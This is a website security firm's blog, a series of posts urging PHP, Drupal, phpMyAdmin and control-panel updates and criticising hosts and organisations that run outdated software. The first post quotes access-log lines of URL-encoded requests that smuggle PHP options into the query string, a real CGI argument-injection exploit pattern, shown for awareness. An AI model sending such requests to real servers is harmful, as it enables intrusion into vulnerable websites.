White Fir Design Blog

Hackers Still Targetting Outdated PHP Versions

Back in May we discussed a website we cleaned up that had been hacked due the exploitation of a vulnerability in the outdated version of PHP being used on the server. The hack would have prevented if PHP had been kept up to date, but based on the fact that we have recently had numerous attempts to exploit the vulnerability there must a fair number of website still being run on vulnerable versions.

The vulnerability in question was fixed in versions 5.3.13 and 5.4.3 and only impacts CGI-based setups. The most recent releases of PHP – 5.3.28, 5.4.23, and 5.5.7 – all include security updates, so PHP should be upgraded to those versions as soon as possible.

If you are wondering what version of PHP your web host is using for your website there are a number of ways to find that out. The least technical way to do that is to contact their customer support and ask them what version of PHP in use. It would also be good to ask them what their upgrade policy is for PHP and other software powering the web server, to make sure that they properly handling that. You can sometimes find the PHP version in use in the control panel for your website or the administrative area of the website. You can also use a tool we have created that allows you to check the version of various software running the server your website is on.

An example of the requests we have been seeing recently is included below. One change from the successful hack we mentioned in the previous post is that the requests are encoded in this instance. That could be to make it harder for software attempting to filter malicious requests to detect that the requests are malicious.

209.139.209.78 – – [31/Dec/2013:23:38:21 -0500] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 301 2347 “-” “Googlebot/2.1 (+http://www.googlebot.com/bot.html)”

209.139.209.78 – – [31/Dec/2013:23:38:22 -0500] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 301 2347 “-”

“Googlebot/2.1 (+http://www.googlebot.com/bot.html)”
209.139.209.78 – – [31/Dec/2013:23:38:23 -0500] “POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 301 2347 “-” “Googlebot/2.1 (+http://www.googlebot.com/bot.html)”

209.139.209.78 – – [31/Dec/2013:23:38:24 -0500] “POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 301 2347 “-” “Googlebot/2.1(+http://www.googlebot.com/bot.html)”

209.139.209.78 – – [31/Dec/2013:23:38:24 -0500] “POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 301 2347 “-” “Googlebot/2.1 (+http://www.googlebot.com/bot.html)”

HostMonster Doesn’t Do Basic Site Security

When it comes to the security of your website, your web host plays an important part but too often they are failing do what they need to do to keep your website secure. One of the areas we have see web hosts fail at is keeping the control panel software running under website’s up to date. With the Plesk control panel that has lead to large amounts of website being hacked due to vulnerabilities that existed in older versions of the software. In attempt to make it easier to spot when web hosts are failing to keep control panel software up to date we have just released a web browser extension Control Panel Version Check, available for Firefox and Chrome, that provides version information for cPanel and Plesk based control panels and warns when an outdated version is in use.

To show how the extension comes can highlight unsafe hosting let’s take a look at one host. HostMonster claims that “By design our servers are secure.” and that “The security level of your site depends on the code that is uploaded to HostMonster’s Servers.”. You would think when they make such a definite statement about their security and faulting customers for any security breach they would at least being doing basic security, but that isn’t the case. The second item on their basic security check list is to “Update all scripts/applications to the newest versions available.” and there reason for this is that “Old security holes are updated and remedied in new versions of software, so updating to the newest versions available ensures that you are running the most secure option available.”. That sounds like reasonable advice; unfortunately they don’t follow it, despite claiming they are secure by design:

Support for version 11.32 of cPanel ended in August. Since then cPanel has put out several security announcements for vulnerabilities in cPanel. With support ended for cPanel 11.32 none of those vulnerabilities would be fixed in that version.

It doesn’t end there, with our phpMyAdmin Version Check extension you can see that they are also running an outdated version of phpMyAdmin:

That version is over a year out of date and there have been numerous security fixes released in subsequent versions.

Using Magento with PHP 5.4 and 5.5

Update (November 24, 2014): Magento has now released Magento 1.9.1.0, which adds supports for PHP 5.5.

Update (January 21, 2014): Magento has now released patches to make Magento 1.6.0.0-1.8.1.0 compatible with PHP 5.4.

Back in July the developers of PHP started encouraging moving from PHP 5.3 to either PHP 5.4 or 5.5 due to the fact that for the next year the only support for PHP 5.3 would be security updates and thereafter support will end entirely. We have now started to see that shift happening and along with it we are seeing an increase in questions and issues related to Magento’s support for PHP 5.4 and 5.5.

As with previous moves from one PHP version to another, PHP 5.4 and 5.5 have made breaking changes from earlier versions of PHP. That means that software can stop working on a new version of PHP and you should make sure that software you are using is compatible with the new version of PHP ahead of the upgrade. Currently Magento does not officially support PHP 5.4 or 5.5. Magento’s System Requirements page currently lists supported versions of PHP being 5.2.13 – 5.3.24. While PHP 5.4 and 5.5 are not officially supported we have found Magento will run on them, but there a couple of important issues that can cause problems that we will get to in a moment.

While we recommend upgrading to Magento 1.8.0.0 as it includes a number of security enhancements and other enhancements, upgrading to that version will not provide improved compatibility for the newer version of PHP even if you are currently using a fairly old version of Magento. We recently did an upgrade of website that was still running Magento 1.3 and that website that was running without issue on PHP 5.4.

There are two areas where you can run into problems when using PHP 5.4 or 5.5:

Order Invoice Printing Error

The one issue that we have found does occur in Magento when using PHP 5.4 or 5.5 is that when you try to print an order’s invoice you will get an error: “Fatal error: Declaration of Zend_Pdf_FileParserDataSource_File::__construct() must be compatible with Zend_Pdf_FileParserDataSource::__construct()”. There is an easy fix for this. In the file /lib/Zend/Pdf/FileParserDataSource.php change the line:

abstract public function __construct();

to:

abstract public function __construct($filePath);

Extension Incompatibilities

While Magento will work with the newer versions of PHP, extensions may not be compatible with newer versions of PHP. PHP 5.4 was released in March of 2012 and 5.5 was released in June of this year, so the latest release of extensions should be compatible with the newer version of PHP by now. The developer of the extension should also be able to tell you if it is compatible with the newer version of PHP. If you want to insure everything will run smoothly, test a copy of the website running on a server using the newer version of PHP before the server with the live website has its PHP version updated. If an extension is not working with the new version of PHP and you don’t want to replace the extension you can use the details of breaking changes in PHP 5.4 and 5.5 as a starting place to determine what changes need to be made to the extension.

Hacked Websites Used To Get Top 10 Search Result For UGG Boots

When hacked websites are covered in the news it is usually due to information stored on the websites being compromised or malware being added to the website, but many websites are hacked for the less newsworthy goal of getting a top search result. We most often see this type of hack used to try get top search results for pharmaceutical related terms, hence this type of hack is often incorrectly labeled as being a pharma hack. We just ran into a set of websites hacked to reach the top search results for a very different item, UGG boots. The Huffington Post reported earlier this week that UGG boots are the fourth most most popular searched gift on Google Shopping, so it is easy to understand why this term would be targeted. In this case the hackers have been fairly successful in making it to the top of the results. Currently the eighth result for the search term for “UGG boots” in Google is one of the websites they have hacked:

At this point Google has detected that website in question has been hacked, but they haven’t removed it from the search results. To put that place in the results in perspective, major chains DICK’S Sporting Goods, Victoria Secret, and Bloomingdale’s all have their UGG Boot pages showing up on the second page of search results for the term.

Hackers also made it to the eight spot for the term “uggs” using another hacked website:

So how do the hackers gain top spots in the search results? The hackers use two sets of websites that they hacked. The first set are hacked to add links to pages on the second set of website. In the first set of websites HTML code full of links like this are added to the website:

Spam Link Source Code

Links are an important factor in how Google decide what pages to show in their search results, so if you can hack a lot of website and insert links to a web page you want to get in the top search results, you can make it happen.

The second set of websites are hacked to show Google content related to the search term instead of their usual content, which is referred to as cloaking. One of the websites in the links above is the website for the Virginia Department of Rail and Public Transportation and you can see the cloaking in action with it. If you do a search for their website right now on Google you will get this listing:

Tech News Websites Not Taking Basic Security Measure With Their Websites

When it comes to improving the security websites one of the biggest problems we see is that there is so much bad information available on the Internet, especially the information coming from companies trying to sell security products and services. We would hope that news organizations would provide the public with a source for better information, but most of the security reporting we see in technology news websites is just as bad as anywhere else. Their lack of security knowledge also impacts their own websites as we see that they are not taking basic security measures with their websites and therefore leaving them vulnerable.

We found three prominent technology news websites that are running very out of date versions of the Drupal software. Keeping software up to date on a website prevents known vulnerability being exploited and we have found that when vulnerabilities in website software are exploited it almost always due to a vulnerability that has already been patched in a newer release of the software.

ITworld

ITworld is running a version of Drupal that is nearly three years out of date – the next version was release in December of 2010 – and they have missed three security releases.

InfoWorld

InfoWorld is running a version of Drupal that is nearly three and half years out of date – the next version was release in June of 2010 – and they have missed four security releases.

Network World

Network World is in much worse shape than the other two organizations as they are using Drupal 5, for which support ended back at the beginning of 2011. They haven’t even bothered to at least make sure they are running the most recent version of Drupal 5. In fact they haven’t updated it in over four and half years – the next version was released in January of 2009 – and they missed the last nine security releases for Drupal 5.

Rackspace’s Bad Security

We have found that web hosts often prominently advertise their focus on security while not actually caring about security enough to even taking basic security measures. Lets take a quick look at Rackspace to see that in action. Rackspace has a whole section of their website dedicated to security. If you look over that you would probably be impressed. Though if look closely you might see warning signs. For example, they have a PDF about their “holistic approach to security” that was written by their Director of Product Marketing. Why is a product marketing person writing a security guide?

You don’t have to look hard to see that Rackspace don’t actually have much concern for security. A really basic security measure is keeping software running up to date. That way the software isn’t vulnerable to known security vulnerabilities that have been fixed in the software. An important component of many hosting services is phpMyAdmin, which allows administration of MySQL databases. If someone can exploit phpMyAdmin they can gain access to the database underlying a website. With that they could collect customer information stored in the database, they could create a new administrator account for a website to gain further access, or do other harmful things. If you believed Rackspace’s claims about their focus on security you would certainly expect they would be keeping their installation of phpMyAdmin up to date. Unfortunately for their customers they don’t:

The version they are running is over a year and half out of date (as the next version of phpMyAdmin was released in February of 2012). It gets even worse, Rackspace only upgraded to that version after a customer alerted them that they were running an outdated and insecure version of phpMyAdmin and took them six months after being alerted to that to do that upgrade.

According to the information on phpMyAdmin’s security page the version Rackspace is running contains a number of security vulnerabilities. The version they are using is so out of date that phpMyAdmin no longer lists if vulnerabilities impact that version, so it isn’t clear exactly how many there are.

Netfirms Running Over Seven Years Out of Date Version of phpMyAdmin

One of the most basic measures for keeping websites secure is to keep software running the website up to date, this is something that web hosts know and tell their customers. Unfortunately, many web hosts don’t seem to feel that they need to heed their own advice and run out of date software on their servers. This put their clients at risk of being hacked though exploitation of a known vulnerability in that software. Web hosts use of outdated software also a warning sign that they may not be handling the rest of the security properly as well.

When we do work on a client’s website we do a check of what version of some common software (PHP, MySQL, phpMyAdmin, etc.) is running of the server. This is partly so that we can see how well web hosts are doing at keeping that software up date and also so that we can alert the clients when severely out of date software is in use. We were recently doing work on a website hosted with Netfirms and we found that the server was using over seven years out of date version of phpMyAdmin, 2.8.0.1:

That version was released on March 8 of 2006 and the next version, 2.8.0.2, was released eight days later. phpMyAdmin provides a page that provides a listing of all security announcements for the software (something that other software developers should also be providing). Based on just the announcements for 2006 and 2007, the version of phpMyAdmin Netfirms is using probably contains 16 serious severity security issues and 1 considered “quite dangerous”.

If you want to check if web hosts you or your clients use are running an outdated version of phpMyAdmin you can check with our phpMyAdmin Version Check extension, which is available for Firefox and Chrome.

It is not just phpMyAdmin that Netfirms doesn’t keep up to date. They are using PHP 5.3.13, which is over a year out of date and also has known security vulnerabilities (including ones that were fixed in the very next release).

Amazingly the fact that they have some pretty obvious security problems hasn’t stop the security company SiteLock from declaring that Netfirms is secure, as can been seen in the footer of Netfirms website:

Secure This: A Website Security Company That Doesn’t Care About Security

One of the biggest problems we see with improving the security of websites is that while basic security measures are often not being taken, security companies are trying sell security services that are not actually needed for most websites. We often see the negative impact of this as people contact us about cleaning up websites and they think they need those types of services because those other companies are pushing the services, while they don’t want to make sure that basic security measures that will actually protect their website are done. A possible explanation of why the companies push those services is that many security companies don’t understand or don’t actually care about security.

Yet another example of this that we came across is Secure This, which is company that wants to sell you automated vulnerability scanning for various software, including Joomla. You average Joomla based website doesn’t need this because the software in use would have already been tested against these automated scanners and any security vulnerabilities that are going to be found would not be spotted by them. What you instead want to do is to make sure that you keep the software up to date so that when security vulnerabilities are found you are protected with the latest version of the software. The importance of keeping Joomla and extensions up to date isn’t just our advice; Joomla says that is keeping them updated is one of the “most important guidelines” for keeping your website secure. Secure This doesn’t feel they need to do that with their website though:

The latest version of Joomla 3.x, 3.1.5, included a fix for Critical Priority security vulnerability, so if Secure This cared about the security of their own website they would have made sure to upgrade promptly in August, when 3.1.5 was released.

If you don’t want to handle keeping Joomla updated you can hire us to do it for you.

MIT Website Running on Very Outdated Version of Apache HTTP Server

When it comes to website security even institutions that you would think would be among the best able to able to protect themselves get hacked. In January the Massachusetts Institute of Technology’s (MIT) website was hacked on multiple occasions. While that seems surprising itself, what is more surprising is that more than six months after that happened MIT is still not taking care of the security of their website.

With our Server Details web browser extension you can see that MIT is using an outdated version of the Apache HTTP Server to run their website:
MIT's Website is Running on Apache 1.3.41 The version they are using is not just a little out date. Support for Apache HTTP Server 1.3 ended back in February of 2010, so MIT should have upgraded to a newer version three and half years ago.

What does it say that even after getting hacked multiple times a major institution is not taking the security of their website seriously?

Outbrain Website Running Outdated and Insecure Version of WordPress

Yesterday a number of major news websites were attacked due to a breach at Outbrain, a provider of widgets that display content recommendations. While the breach of Outbrain utilized social engineering, it is clear that Outbrain isn’t properly handling security of their systems, as they don’t even take basic security measures with their own website. One of the basic security measures is keeping software running a website up to date, which Outbrain hasn’t been doing:

Not only is that version over a year out of date, but they have failed to apply four updates that included security fixes (3.4.1, 3.4.2, 3.5.1, and 3.5.2). The release announcement for 3.5.2 included the warning:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

Considering how easy it is to update WordPress, their customers should be worrying about what other things they are also failing to do.